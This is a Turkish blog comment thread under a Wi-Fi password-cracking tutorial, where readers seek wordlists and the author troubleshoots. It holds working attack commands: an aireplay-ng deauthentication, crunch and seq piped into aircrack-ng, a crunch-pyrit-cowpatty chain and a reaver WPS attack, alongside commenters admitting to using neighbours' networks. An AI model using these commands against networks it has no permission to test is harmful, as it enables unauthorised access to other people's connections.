    murat abicim ben meb şifrelerini kımam lazım sadede senden istedim muratabi meb şifrelerini kımak istiyorum bana ling atarmsın batrack indirdim kulanımı nasıl kırabilirim epostaya atarmısın

  200. #352 yigitcan tarafından, tarihinde

    merhaba murat abi bana wordlist verebilirmi biri acilen denemek istiyorum bu yönetemi ayrıca platoon wireless adaptör var bunla dinleme yapabilir miyim….

    • #353 Murat Çeşmecioğlu tarafından, tarihinde

      Elimde wordlist yok ne yazıkki. İnternetteki diğer sitelerden bulabilirsiniz.
      Kartın çalışıp çalışmayacağını öğrenmenin en kolay yolu Backtrack’i açıp bakmak 🙂

  201. #354 kaan tarafından, tarihinde

    selam abi tekra Elcomsoft hakkında bilgim yok biraz bahsedermisin? Elcomsoft içinde wordlist gerekli degil mi?

    • #355 Murat Çeşmecioğlu tarafından, tarihinde

      Elcomsoft için wordlist gerekli değil. Kendisi de şifre üretip deneyebiliyor. Ayrıca ekran kartınızın işlemcisini de bu iş için kullanabiliyor.

  202. #356 Mustafa tarafından, tarihinde

    Benim anlamadığım yer şu “Bu işlemlerin en sonunda elimizdeki kelime listesi ile şifreyi karşılaştırıyoruz.” Şifre 11 ise bizde 0-10 arası rakamlar olan bir wordlist varsa şifreyi kıramazsınız demişsiniz. O zaman ne gerek var paket falan toplamaya.Elimizdeki wordlisti sırayla modeme deneyecek bir program olsa aynı şey değil mi?
    Zaman farkı mı var arada ? Anlattığınız işlem daha mı hızlı ?

    • #357 Murat Çeşmecioğlu tarafından, tarihinde

      Paket toplama kısmında handshake yakalıyorsunuz. WPA için 50000 tane paket toplamaya gerek yok.

  203. #358 kaan tarafından, tarihinde

    abi bu wireless kırma programları diyo o programlar yanılmaca diil mi?

    • #359 Murat Çeşmecioğlu tarafından, tarihinde

      Çoğunun içinde aircrack’in windows sürümü, netstumbler vs. gibi programlar var. Hiç indirmedim öyle bir program paketi 🙂

  204. #360 bahadır tarafından, tarihinde

    her şey iyide bence boot işi falan gerek yok wmware iş görmezmiydi?

    • #361 Murat Çeşmecioğlu tarafından, tarihinde

      WMvare bazı kartları tanımakta sorunlar yaşayabiliyor. Dual boot olarak açtığınızda, ramden bile çalıştırmış olsanız, kendi işletim sistemi gibi çalışacak. Sizin kartınızla sorun çıkartmıyorsa tabiki o şekilde kullanabilirsiniz.

  205. #362 Onur tarafından, tarihinde

    Murat abi açıkcası ben yazılımdan anlamam ama ben şifre kırmak istiyorum öğrenciyim param yok bana güzelce anlatma şansın varsa çok teşşekür ederim

  206. #364 efe tarafından, tarihinde

    iyi günler murat bey elimdeki wordlistin wpa ve wep için basamak sayısı kaç olmalı en az ve en fazla(yani en az 5 karakter mi içermeli en fazla 50 karakter filan mı? )..ilgilenirseniz sevinirim..

  207. #365 Ea tarafından, tarihinde

    elcomsoft un türkçesi var mı? varsa link atar mısın?

    • #366 Murat Çeşmecioğlu tarafından, tarihinde

      Elcomsoft’un türkçesi olması gerekli ama bildiğim bir link yok. Kendi sitesine baktınız mı?
      Olmasa bile internette bolca videolu anlatımı mevcut.

  208. #367 kaan tarafından, tarihinde

    selam abi. bactrack ile wordlist oluşturuyormu? yardımcı olabilirmisin.

  209. #368 gokan tarafından, tarihinde

    slm murat bey bende Backtrack 5 kurulu bu komutlar Backtrack 5 tede çalışırmı? yoksa Backtrack 4 mü indirip kuralım wpa sifreside kıra bilirmiyiz bize öneriniz varmı.

  210. #370 Ea tarafından, tarihinde

    bildiğin wordlist var mı varsa link atarmısın. internettekilerin hepsi sadece sayı bulunan wordlistler adam sayı+harf koyduysa bulamıyor yardım eder misin

  211. #371 murat tarafından, tarihinde

    Slm ben wpa ve wpa2 şifre uzunluğunu sorucaktım

    • #372 Murat Çeşmecioğlu tarafından, tarihinde

      8-63 karakter arasında olabilir. Bu nedenle içinde 1’den 999999’a kadar sayılan olduğu wordlistleri boşuna indirmeyin 🙂

  212. #373 kaan tarafından, tarihinde

    selam abi. bu Elcomsoft ayrıntılı kullanımlarını anlatan bir video yada resmli anlatım paylaşa bilirmisiniz? ben tam olarak çözemedim abi bunu ekran kartını nasıl kullanıyoruz? maskaleme saldırısı var onunla mı?

  213. #374 bilal tarafından, tarihinde

    Ben wpa 2 veya wpa kırarken wordlist imin nerede olduğunu bulamıyourm daha doğrusu /all.txt olarak root içinde fakat onu yazınca wordlist içi boş diye bir hata ile karşılaşıyorum acaba neden olabilir? ya da doğru mu yazıyorum wordlist root içerisindeyse /wordlist in adı.txt yazmalyım değil mi?

  214. #376 ahmed caner tarafından, tarihinde

    murat backtrack 5 kullanıyorum ama wpa ve wpa2 handshank yaptıktan sonra Türklerin kullanığı sağlam ve düzgün bir wordlist bulamadım. her milletin var ama türklerin yok. bu konuda yadımcı olurmusun. tskkk…

    • #377 Murat Çeşmecioğlu tarafından, tarihinde

      WPA kırmakla ilgilenmediğim için wordlist bulabileceğiniz yerleri bilmiyorum. Wireless ile ilgili türkçe forumlara bakabilirsiniz.

  215. #378 kadir tarafından, tarihinde

    win7 için ne yapacağız bu komutlar sadece linux için mi?

  216. #380 kadir tarafından, tarihinde

    Hocam çok güzel bir makale hazırlıyorsunuz ama bir yeri eksik olunca olmuyor.Bu worldlist için güvendiğiniz bi site fln varmı.
    birde yukarıdaki adımları izliyorum bitürlü
    wordlistin nereye atılacağı konusunda birşey bulamadım.Ya nerde kullandığımızı

    • #381 Murat Çeşmecioğlu tarafından, tarihinde

      Gördüğüm kadarıyla yazının eksik biryeri yok. Yazıda nasıl kırılacağını anlattım. Wordlist paylaşmadım. Nedenine gelirsem; öncelikle Türkiye şartlarında kullanabileceğiniz wordlistler çok fazla yok. 8 karakterli sayıların olduğu wordlistler internette bolca bulunuyor. Kelimelerden oluşan wordlistleri kendiniz hazırlamanız gerekebilir. Yani oturum TDK sözlükteki tüm kelimelerden bir wrodlist yapabilirsiniz.
      Wordlist için bildiğim bir site yok. Dolayısıyle güvendiğim bir site de yok.
      Wordlistleri Backtrack’ta masaüstüne yada USB bellekte tutabilirsiniz. Sonuçta aircrack-ng komutunda doğru şekilde belirtin yeterli. Örneğin masaüstüne koyduysanız -w /root/Desktop/wordlist.txt gibi bir parametre yazmanız gerekir.

  217. #382 Onur tarafından, tarihinde

    Murat Abicim Numaranı Verme Şansın Varmı Arasak Konuşsak Ne Olur Abicim WPA Şifre Kırmam Lazım Yoksa Bizimkiler Eve Almayacak Çadırda Yaşayacağım .:)

    • #383 Murat Çeşmecioğlu tarafından, tarihinde

      Hayır, telefon numaramı verme şansım yok. Ve hiçbir ailenin çocuğunu, WPA şifre kırmadığı için eve almayacağını sanmıyorum 🙂
      Takıldığınız yerleri buraya yazarsanız elimden geldiği kadar yardımcı olmaya çalışırım.

  218. #384 gardeononur tarafından, tarihinde

    Abicim Faceden demi ekleyemiyorsun ?

  219. #386 Onur tarafından, tarihinde

    Pekİ Abicim WPA Şifre kırabilmem için alet gereklimi ? bende yok da

  220. #387 İbrahim tarafından, tarihinde

    İyi günler hocam. Ben ağdaki kişiyi düşürmek için “aireplay-ng –deauth 1 -a 00:18:39:2b:4c:98 -c 00:21:6b:3e:14:c2 mon0” komutunu verdiğimde sizin resimde verdiğiniz gibi ağdan düşürmek için paketler yollamıyor sanırım. Çünkü 2 satırlık bir yazı çıkıp duruyor ve komut verme satırı geliyor yeniden. Bütün adımları kontrol ederek tekrar tekrar yaptım ama sonuç aynı. Neden acaba bir fikriniz var mı? Eğer anlaşılması güçse ekran görüntüsünü alıp daha sonra onu da atabilirim? Teşekkürler

    • #388 Murat Çeşmecioğlu tarafından, tarihinde

      Tek bir paket gönderdiği için o kadar kısa sürüyor. Handshake yakaladıysanız olmuş demektir.

  221. #389 İbrahim tarafından, tarihinde

    Hocam son bir soru daha sormak istiyorum. Herşeyi yaptım fakat sondaki wordlist denemek için olan komutu yapamadım. Yerini belirtiyorum dediğiniz gibi ama hep hata veriyor. Yanlış dosya ya da klasör diyor. Bir tek o kaldı, şifre kırmaya başlamam için

  222. #390 burak tarafından, tarihinde

    murat hoca ibrahim arkadasin dedigi gibi backtrack ı dual boot ta açtıktan sonra hiçbir şekilde wordlist i gösteremiyoruz.. birde dual boot yöntemiyle girdigimiz backtrack e crunch u nasil kurarız?

  223. #392 çağatay tarafından, tarihinde

    sa. abicim HER ŞEY TAMAM KENDİ MODEMİMDE DENEDİM MAC FİLİTRESİ FALAN YOK PAKETLERİ GÖNDERİNCE DATA FALAN YÜKSELMİYO 1 SAAT GEÇTİ 12 OLDU DATA ANCA KAPATTIM SONRA ÇEVREDEKİLERE DENEDİM ONLARDADA AYNI BİDE BANA WORDLİST BULABİLECEĞİM KAYNAK VEREBİLİRMİSİN ÇOK ARAŞTIRDIM YOKK TÜRKÇE MODEMİN LAPTOPLA ARASINDA YARIM METRE WAR

  224. #393 ergün tarafından, tarihinde

    birçok arkadaş wordlisti gösterememekten şikayetçi.. bu çok basit bi olay.. wordlistiniz neredeyse onu sürüklemeniz yeterlidir.. yada şöyle yapın.. paketinizi ve wordlistinizi backtrack te masaüstüne atın.. konsolu açın ve sırasıyla şunları yapın..
    1- “aircrack-ng -c” yazın..
    2- paketinizi -c nin yanına sürükleyin..
    3- “-w” yazın..
    4- wordlistinizi -w nin yanına sürükleyin..
    5- Enter a basın.. İşlem tamam..

    Ben bu şekilde kırdım.. Benim de bir sorum olacaktı.. Backtrackın desteklediği adaptörlere baktım da bir sonuca ulaşamadım.. Laptop kullanıyorum ve atheros AR5B97 wireless adaptör var.. bt R2 destekliyormu? destekletebilirmiyiz.. BT dışında paker-t toplama imkanımız yokmu?
    Elcomsoft desteklemiyor..
    comview, netstumbler filan desteklemez mi?? size zahmet ilgilenebilirmisiniz murat bey.. Şimdiden teşekkürler..

  225. #394 ergün tarafından, tarihinde

    bu arada ben vmware ile kullandım.. güzel yani.. sorunsuz kullanıyorum..
    kırdığım zaman arkadaşın usb wireless adaptörünü kullanmıştım.. komutlarda -c ve -w yazınca bir boşluk bırakın ve komutun yani -c veya -w nin sağına sürükleyin..

  226. #395 asi tarafından, tarihinde

    şifre kırıp başkasının netini kullanıyorsunuz ve bu da kul hakkı oluyor. kullandığınız kişinin neti kotalıysa ne olacak? bununvebali gerçekten çok ağır olur. tahmin edemeyeceğiniz şeyler olabilir.bu sizinle ilgili olmasada o kişiler için olabilir

  227. #397 erdi tarafından, tarihinde

    hocam bize iyi bir wordlist lazım yoksa bu iş yaş. veya wordlistsiz başka kırma yöntemleri var mı? varsa yazıp anlatırmısınız. wpa da wep gibi kırılsa çok iyi olurdu. çünkü çevremdeki wifilerin hepsi wpa-wpa2. bir türlü kıramıyorum.

  228. #399 mehmet tarafından, tarihinde

    sa hocam
    acaba wordlistleri winrar halinde kullanabilir miyiz yani 80gb lik wordlist sıkıştırarak backtrack da rar ı açmadan kullanabilirmiyiz

    • #400 Murat Çeşmecioğlu tarafından, tarihinde

      Sizin dediğiniz Nutella kavanozunu açmadan Nutella yemeğe benziyor 🙂 Olmaz o şekilde.

  229. #401 ObL tarafından, tarihinde

    şimdi arkadaşlar şifreyi kırabilmek için txt metin belgesi gerekli tamam.
    backtrack serilerinde “./crunch” uzantısı ile şifre oluştura biliniyor bunada tamam
    fakat wordlist.txt gibi türkçe karakterli doslayarda sağlam bi veri olabilmesi için yani her gittiğin yerde şifre kırmak istiyorsak 1TB gibi bir boyut tutmakta bu wordlist.txt dosyamız….
    benim şöyle bi önerim olacak (yapıla bilirmi bilmiyorum)
    bu işteki uzman arkadaşlar bi göz atarsa eğer önerim bu wordlist.txt dosyasını ortadan kaldırarak direk backtrack uçbirim içinden ./crunch komutu ile kendiliğincen şifre kırımı için yeni bi kod üretile bilirmi ?

    cevap yaparsanız benim gibi bir çok arkadaşı wordlist.txt madurluğundan kurtarabilirsiniz 🙂

    • #402 Murat Çeşmecioğlu tarafından, tarihinde

      Benim bildiğim crunch wordlst oluşturmaya yarıyor. Szin dediğinizde oluşturduğu şifreleri direk aircrack-ng ile ortaklaşa çalışıp kırması gerekli.
      Bunun yerine airdump-ng ile kayıt ettiğiniz pcap dosyasını Elcomsoft ile açabilirsiniz. Sanırım Elcomsoft’un programının böyle bir özelliği var.

  230. #403 YUSUF tarafından, tarihinde

    SA,
    win7 de wireless şifre kırma işlemi yapılabiliyomu?
    Yapılabilir ise bana yol gösterebilirmisiniz?
    Tşk.

  231. #405 Tamerlan (Azerbaycan) tarafından, tarihinde

    Merhaba, hocam. İlk önce size çox teşekkür ederim. Bi sorum var, şimdi elimizdeki şifreleri bu Handshake-daki şifrelerle karşılaştırıyoruz. Eğer uyumluluk varsa, bize şifreni gözteriyor. Benim anlayamadığım şu: şimdi şifreler zaten bu Handshake dediyimiş şeyin içinde var, onu ordan direk çıkaramazmıyız? 🙂

    • #406 Murat Çeşmecioğlu tarafından, tarihinde

      Hayır çıkartamayız. Veriler, bir şifre ile şifrelenmiş halde bulunuyor ve çözmek için yine aynı şifreyi bilmek gerekiyor.
      Çok basitçe şöyle anlatabiliriz: Siz bir metni “abc” anahtarıyla şifreleyip modeme gönderiyorsunuz. Modem, aynı veriyi kendi içindeki anahtarla şifreleyip karşılaştırıyor. Gelen mesaj aynı ise anahtar doğrudur. İşte sizin modeme gönderdiğiniz şifrelenmiş kısım handshake. Yani içinde anahtar yok. Sadece anahtar ile şifrelenmiş mesaj var.
      RC4 şifreleme algoritmasını incelerseniz detaylı bilgi alabilirsiniz.

  232. #407 sinan tarafından, tarihinde

    murat hocam elcomsoft un internetdeki videoları o kadar açıklayıcı ve şifre kırmaya yönelik değil sizde bunun gibi resimli anlatımda elcomsoft u anlatırsanız benim gibi diğer arkadaşlarıda mutlu edersiniz.

    • #408 Murat Çeşmecioğlu tarafından, tarihinde

      Elcomsoft’u kullanmıyorum malesef. Söz vermiyim ama aklımın bir köşesinde dursun bu öneriniz. Teşekkür ederim.

  233. #409 Kavalyeri tarafından, tarihinde

    Sevgili Murat Abi,
    Bende wireless kırmak istiyorum. Dediklerini yapacam fakat wordlist yapma programı indirdim. Tam 1 gün geçti ve c harfine anca geldi. Boyutu önemli değil ama bunu oluşturmak haftalar alacak gibi. Sen senin kullandığın wordlisti paylaşırsan sevinirim. Çoğu kişide bundan mağdur sanırsam. Piyasada bir kaç tane mantıklı wordlist vardı fakat hep ingilizce kelimeler falan vardı. Türkçe bir wordliste ihtiyaç var Murat Abi.

    • #410 Murat Çeşmecioğlu tarafından, tarihinde

      Merhaba. Malesef benim kullandığım herhangi bir wordlist yok. Yani WPA kırmakla uğraşmak istemiyorum çünkü, sizin de fark ettiğiniz gibi, çok fazla olasılık var.

  234. #411 Huskar tarafından, tarihinde

    Murat bey çok faydalı bir yazı yazmışsınız teşekkür ederim.

    Merak ettiğim bir soru var. Bu işe başlamadan önce elimdeki donanımında sanıyorum Backtrack programları için uyumlu olması gerekli.
    Sistemim; Windows 7 64bit.
    Adapter Atheros AR5B93 modeli.

    Sıkıntım paket toplamak istediğimde wireless adapter in Backtracke uyumlu olmaması.

    Ne yapmalıyım, ne önerirsiniz.

    • #412 Murat Çeşmecioğlu tarafından, tarihinde

      Eğer kartınızı desteklemiyorsa ya driverların çıkmasını bekleyeceksiniz ya da yeni bir kart alacaksınız 🙂
      Ben zamanında beklemiştim.

  235. #413 efe tarafından, tarihinde

    worldlist olmadan wpa kırılabiliyor ancak wordlistle kırmaktan daha zor bir yol.Ben denedim çalışıyor.Buyrun:

    bu sistem tam 2 ay önce bulunmus olup Berlin teknik universitesinde bir profesor tarafindan bulunmustur.

    komutlari söyle dize getirelim

    bt 4 te shellimizi aciyoruz arkadaslar ve oraya
    cd /pentest/passwords/crunch/
    komutunu veriyoruz ordan crunch isimli programin klasorunu aciyor gelelim simdi crunch umuzu startlamaya
    ./crunch 1 16 0123456789 | aircrack-ng -w- -b (routerin adi) /root/(dosyanin adi).cap (ivs ise .ivs yaz)

    burda bu verilen komutta bu bastaki 1 sifremizin basamak sayisi olup 2. sirada duran 16 ise bitis basamak sayisidir. orda yazdigim 1234567890 ise deneme yaparken kullanilicak kombinasyondaki karakterler dir. yani 1234…90qwertzuo falan filan kendi harflerini de ekleye bilir insan. büyük harflerde eklene bilir.

    gelelim seq isimli programimizla sadece sayisal degerden wpa hack yapmaya.
    seq 10000000 99999999 | aircrack-ng -w- -b (modem adi) /root/(dosya adi).cap olarak seq ile 10000000 ile 99999999 arasinda kalan sayilarin hepsini deneme yapabiliriz.

    simdi gelelim cowpatty ve pyrit ile wpa sifre kombinasyonu hack imize

    cd /pentest/passwords/crunch/
    komutumuzu verdik diyelim.
    ./crunch 1 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -e (modem adi) -i – -o – passthrough | cowpatty -d – -r /root/(wpadosyasinin adi).cap -s (modem Adi)

    burda bu crunch kodunda biz 1 ve 8 basamakli arasinda a- dan z ye kadar olan buyuk sayilarin denenmesini istedik pyrit islemciyi cok zorlayarak cowpatty nin yardimi ile daha seri bir sekilde sifreleri kirmanizi saglar. i7 4×2.8 islemcisi olan ve ekran karti 2 x gts serisi ekran karti ve ayriyetten 8 gb ram i olan makinada 10 dk icerisinde 1 milyon sifre kombinasyonu denedik. Ama sifreyi adam boru gibi koydugu icin en az 2 ay ugrasmamiz gerekecekti. bizde ondan ugrasmadik 2 haftadan sonra.

    NOT:ALINTIDIR

  236. #414 ergün tarafından, tarihinde

    selam murat abi benim önemli bir sorunum var..
    (USB den Linux u kullanma yazısına yorum yapmıştım ama 2 aydır yorum atan olmadığı için cevap gelmez düşüncesiyle buraya yazayım dedim.. Kusura bakmayın..)

    elimde çökmüş bir bilgisayar vardı ve ben de xboot gibi programla mini xp, avg kurtarma cdsi, avira av vs vs kurdum.. yani pc açılırken usb hdd den boot ederek win7 bilgisayarımda win xp yi kullandım..(diğerleriyle uğraşmadım) bazı .iso ların usb den boot edilmesi için .iso sunu indirdiğim programların usb den kullanmak için çeşitli programlarla kopy\paste olayı filan vardı.. Şimdi kafama takılanlar şunlar..
    1- Usb den kullanmak için bahsedilen programların bir önemi varmı, mesela ben xboot u kullandım, her program(.iso) için xboot ile usb yi hazırlayabilirmiyim..
    2- Her .iso yu usb den kullanabilirmiyim..
    3- Backtrack 5 i usb den kullanabilir miyim..?

    NOT: Usb den kullanmaktan kastım, usb den kurmak değil, yani herhangi bir bilgisayara (xp,7 veya pardus işletim sistemleri olabilir) , usb yi takıp, backtrack i kullanıp, işim bittiğinde de çıkarıp orjinal işletim sistemiyle devam edebilirmiyim..

    Bunlar bilgisayarıma\verilerime zarar verirmi??
    Cevabını merakla bekliyorum.. Şimdiden teşekkürler..

    • #415 Murat Çeşmecioğlu tarafından, tarihinde

      xboot’u bilmiyorum, hiç kullanmadım. USB’ye multiboot için GRUB kurarken Easy Image adlı programı kullanıyorum.

      2. sorunuza net bir yanıt veremiyorum. GRUB için ISO’yu ramden yada usbden çalıştıran kodlar mevcut. Ama hepsinin olcağını sanmıyorum. En güzel yöntemi açılışta sanal cd oluşturup ISO’yu buna yerleştirmek ve ordan boot etmek.

      Backtrack 5’i unetbootin programı ile USB’den çalıştırabilirsiniz -> http://www.backtrack-linux.org/wiki/index.php/UNetbootin_USB_Installer

      Eğer çöken bilgisayarınızı kurtarmak için birşeyler arıyorsanız tnctr.com’dan F_S_M adlı arkadaşın yaptığı Mini XP’yi kullanabilirsiniz. Network destekli versiyonu mevcut. Benim flashımda var ve çok memnunum. -> http://www.tnctr.com/topic/19565-tnc-livecd/

  237. #416 meskure tarafından, tarihinde

    hocam bende wmare üzerine kurulu benini var Handshake yakalıyorum ama bunu Elcomsoft programına göstermiyorum nerede bulamıyorum bana bu konuda yardımcı olur musunuz?
    aynı zamanda worklist de lazım nereden bulabilirim?

    • #417 Murat Çeşmecioğlu tarafından, tarihinde

      Elimde wordlist yok, üzgünüm.

      Elcomsoft ile ilgili birçok türkçe kaynak ve video mevcut. Youtube’a bakabilirsiniz.

  238. #418 özgür tarafından, tarihinde

    murat abi bnm bağlantım wlan0 değilde usbden bağlı olduğu için rausb0 olarak görüyor .bu kodları calıstıramıyorum.ne yapmam lazım abi.

    • #419 Murat Çeşmecioğlu tarafından, tarihinde

      wlan0 yazdığım yerlere rausb0 yazdınız mı?
      Düzenleme: Sonraki yorumda olmadığını yazmışsınız. VirtualBox yada VmWare ile çalıştırmayı deneyin.

  239. #420 İbrahim tarafından, tarihinde

    İyi günler hocam. WPA şifre kırmak için handshake yakalamak şart değil mi? Bi de hocam WEP şifrelemede bir komutla biz ağa bağlanıyorduk ya, bunu WPAda ağa birisinin bağlanmasını beklemek yerine yaparsak işe yarar mı?

    • #421 Murat Çeşmecioğlu tarafından, tarihinde

      Hayır işe yaramaz. Handshake gerekiyor. Sonrası deneme-yanılma metodu.

  240. #422 serdar tarafından, tarihinde

    murat abi benim merak ettiğm bi konu ama teknik olarak mümkünmü bilmiyorum şimdi bu wpa şifrelerini kırmak için gereken wordlist gerçekten ölüm gibi.Ama bunun yerine kırmak istediğimiz modemin ssıd sini kullanarak sahte bir ağ oluşturup kullanıcıyı yanıltıp bağlanmaya çalışırken yazdığı şifrenin direk bize gelmesini sağlayabilirmiyiz/bilemezmiyiz ? şimdiden teşekkürler

    • #423 Murat Çeşmecioğlu tarafından, tarihinde

      O benimde aklıma geldi ve biraz araştırdım ama tam bir cevap bulamadım. İzlenimlerim olmuyor yönünde 🙁
      Bu konuda farklı bir taktiğim var ama gerçek bir kurban üzerinde hiç denemedim 🙂

  241. #424 Burak tarafından, tarihinde

    Murat hoca wep teki anlattığın gibi açıklayıcı olmamış biraz daha ayrıntılı anlatabilirmisin boş vaktinde?

  242. #426 Burak tarafından, tarihinde

    abi bide ben bu backtrackı startx diye açıyorum kapatamıyorum windows gibi kapanmıyor kimsede nasıl kapatıldığını yazmamış :S

  243. #428 Burak tarafından, tarihinde

    teşekkürler abi o dediğin program nasıl birşey

    • #429 Murat Çeşmecioğlu tarafından, tarihinde

      Programdan bahsetmedim. Backtrack’i kapatmak için konsola poweroff yazıp enter’a basman yeterli.

  244. #430 Burak tarafından, tarihinde

    hani şifre kıran ekran kartıyla

  245. #431 Huzeyfe tarafından, tarihinde

    Uzun İş Backtrack3 le Dinleme yaparken Kendi Kırıyo Zaten Bunlar Ne Icın anlamadm Spoonwepten Ayarı verıyo yalnız wep Sıfreleme İcin 4 saat dinlemede bıraktım zor kırdı Wpa da kac gun bekler bılemem

    • #432 Murat Çeşmecioğlu tarafından, tarihinde

      Backtrack 3’ün dinleme yaparken nasıl kırdığını anlatmak ister misiniz?

  246. #433 nuray tarafından, tarihinde

    ben cep telefonumdan kullanmak istiyorum interneti onun içinde bir formül varsa zahmet olmasa söyleyebilir misiniz. Burada kablosuz ağ çok var ama hepsi şifreli.Şimdiden teşekkürler…

    • #434 Murat Çeşmecioğlu tarafından, tarihinde

      Nokia N900 ile aircrack-ng çalıştırıp kırmayı deneyenler var. Ancak videolar ne kadar gerçek bilmiyorum. Kendim hiç denemedim. Şimdilik zor gözüküyor.

  247. #435 erdem tarafından, tarihinde

    hocam merhaba.Vmware Workstation ile sanal makine oluşturup black track 5 i sorunsuzca kurdum.
    wap şifresini girmek için verdiğiniz ilk kodu girdiğimde-airmon-ng start wlan0- kodunu

    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    1553 dhclient3

    Interface Chipset Driver
    ifadesi karşıma çıkıyor. daha sonraki kodu yazdığımda ise -irodump-ng -c 11 mon0 – kodu
    No command ‘irodump-ng’ found, did you mean:
    Command ‘airodump-ng’ from package ‘aircrack-ng’ (universe)
    irodump-ng: command not found
    hatasını alıyorum.bir yerde yanlışlık mı yaptım aceba?

    • #436 Murat Çeşmecioğlu tarafından, tarihinde

      Evet küçük bir yanlışlık olmuş. irodump-ng yazmışsınız. airodump-ng yazmanız gerekiyordu.

  248. #437 murat tarafından, tarihinde

    Abicim iki dakikada handshake yakalama şansımız var mı acaba bir saat bekliyorumda.

  249. #438 oğuz tarafından, tarihinde

    Vmware Workstation ile sanal makine oluşturup black track 5 i sorunsuzca kurdum.
    wap şifresini girmek için verdiğiniz ilk kodu girdiğimde-airmon-ng start wlan0- kodunu
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    PID Name
    1553 dhclient3
    Interface Chipset Driver
    da birşey görünmüyor acaba wireless kartını mı tanıtmam gerekyor

  250. #440 murat tarafından, tarihinde

    murat abi bu handshake işlemini nasıl hızlandırabiliriz yani nasıl hızlı yakalayabiliriz?

  251. #441 Murat tarafından, tarihinde

    hepsini yaptım.fazlada sürmedi handshake bulması.ama bu uğraşların hiç birisine değmeyecek birşey var oda 1 TB kadar büyük olabilecek worldlist dosyaları var.yani 1 TB bir şifre albumunden o şifreyi buldurmak için ölümsüz olmanız gerekiyo. handshake dosyasının çözümlenmesi için başka bir yol olmak zorunda…

    • #442 Murat Çeşmecioğlu tarafından, tarihinde

      Ölümsüz olmaya gerek yok 🙂 Dünyadaki bütün bilgisayarları birbirine bağlayın, hepsi kırmaya uğraşsınlar.

  252. #443 YILKI tarafından, tarihinde

    handshake yakaladımmı diye dediğin komutu yazıyorum , yada şifreyi kırması için yazılan son komutu yazıyorum sonuç” Plase specify a dictionary (option -w).” yazıyor.aynen talimatlarınıza uydum ama handshake yakalayamadım.sayenizde 8-9 aydır ücretsiz wep şifreli net kullanıyorum ama bu wpa yıda yapmak istiyorum.sorun ne şimdi. diyeceksiniz ki neden çünkü sanırım farkına varabiliyorlar ilk kırdığım wep sahibi 3-4 kez şifre değiştirdi sonunda sanırım wpa yaptı.benim onların net ine bağlandığım nasıl farkına varıyorlar acaba.

    • #444 Murat Çeşmecioğlu tarafından, tarihinde

      Yazdığınız komutu buraya yazabilir misiniz? Ayrıca -w parametresi ile belirttiğiniz dosya mevcut mu?

  253. #445 baha tarafından, tarihinde

    Ya bunlri yaparkn internet gerekiomu

  254. #447 Mehmet Ali tarafından, tarihinde

    Meraba Murat Bey;
    Back Track 5 te de aynı direktifler iş yarıyor değil mi?

  255. #449 adnan tarafından, tarihinde

    Murat Çeşmecioğlu kardes ugrastırmadan programla şlifre kırılıyormuş böyle bişi varsa bizimle paylasırmısın bu kadar ugrasmıyorum bn zamanım kısıtlı

  256. #451 adnan tarafından, tarihinde

    benim int. annemler kapattı benim internete cok ihtiyacim war vireles alsam assa kattakinin sifresini nasıl kırarım bi yardımcı olun kırmam lazım
    cok acele int girmem lazım benm

  257. #453 ismail tarafından, tarihinde

    wps koruması aktif olan wpa ve wpa2ler
    de kırılabiliyor WORDLİST olmadan program bt5 de reaver
    komutda 😀
    # reaver -i mon0 -b 33:22:55:22:11:2F

  258. #455 Gökhan tarafından, tarihinde

    Android ten nasıl kırabilirim yazarmısınız

    • #456 Murat Çeşmecioğlu tarafından, tarihinde

      Henüz Android ile bir denemem olmadı. Bu konuda yardımcı olamayacağım.

  259. #457 slayer tarafından, tarihinde

    hocam sizden ricam, adam gibi arayüzle çalışıp kullanırken kodlarla ugrastırmicak bi wordlist oluşturma programı var mı bildiğiniz. ubuntu içinde de çalışabilen bi şey olursa mutlu olurum. kolaylıklar. tşk.

    • #458 Murat Çeşmecioğlu tarafından, tarihinde

      GUI ile çalışan bir program varsa da ben bilemiyorum. crunch aslında kullanması kolay bir program. Arayüze ihtiyacı olmadığı için yapmamış olabilirler 🙂

  260. #459 özkan tarafından, tarihinde

    hocam boş bi zamanınızda Beini’de wpa şifresini kırmayı anlatabilirmisiniz

  261. #460 karahisari tarafından, tarihinde

    WPA kırmada da wps crack diye birşey var ona ygunlaşabilirsiniz 🙂

  262. #461 kaan tarafından, tarihinde

    selam abi . abi burada herhangi bir program crack lemeyide anlatır mısın?

  263. #463 sekhar tarafından, tarihinde

    wheres d password of wordlist in rapidshare???

  264. #465 sevket tarafından, tarihinde

    Backtrack 4 Final sürümünün ISO dosyasını nasıl yukleyecegız

  265. #467 Meral tarafından, tarihinde

    Bende packet die bişy yok terminalde görünmüor bu sorun olur mu?

    • #468 Murat Çeşmecioğlu tarafından, tarihinde

      Modeme bağlı kullanıcı olmadığı için alttaki bölüm çıkmıyor olabilir.

  266. #469 ete tarafından, tarihinde

    abicim bide wriless programını önersen sana yatar kalkar dua edrim

  267. #471 Cenker tarafından, tarihinde

    windows 7 ve backtrack 5 kullanıyorum yeni konsol açma nasıl oluyor?

    • #472 Murat Çeşmecioğlu tarafından, tarihinde

      Ekranın sol altındaki ikonlardan siyah pencere gibi olan ikona basıp konsolu açabilirsiniz.

  268. #473 Sinan tarafından, tarihinde

    Hocam wpadeneme.cab dosyası nerdedir yada bulup backtrack da nereye kopyalamamız gerekir aynışekilde masaüstüne bir worldlist.txt yarattım bu masaüstündemi kalıcak yoksa çalışması için bi yere taşımam gerekirmi
    Aldığım hata şu
    Aircrack-ng -a 2 wpadeneme-01.cap -w wordlist.txt yazıp enter dediğimde
    Fopen (dictionary) failed no such file or directort die bi hata alıorum

    • #474 Murat Çeşmecioğlu tarafından, tarihinde

      Hangi klasörde işlem yapıyorsanız .cap dosyası orada oluşturulur.

  269. #475 Jale tarafından, tarihinde

    selam bende bu proqram yok nasil elde ede bilirim acaba

  270. #477 yusuf tarafından, tarihinde

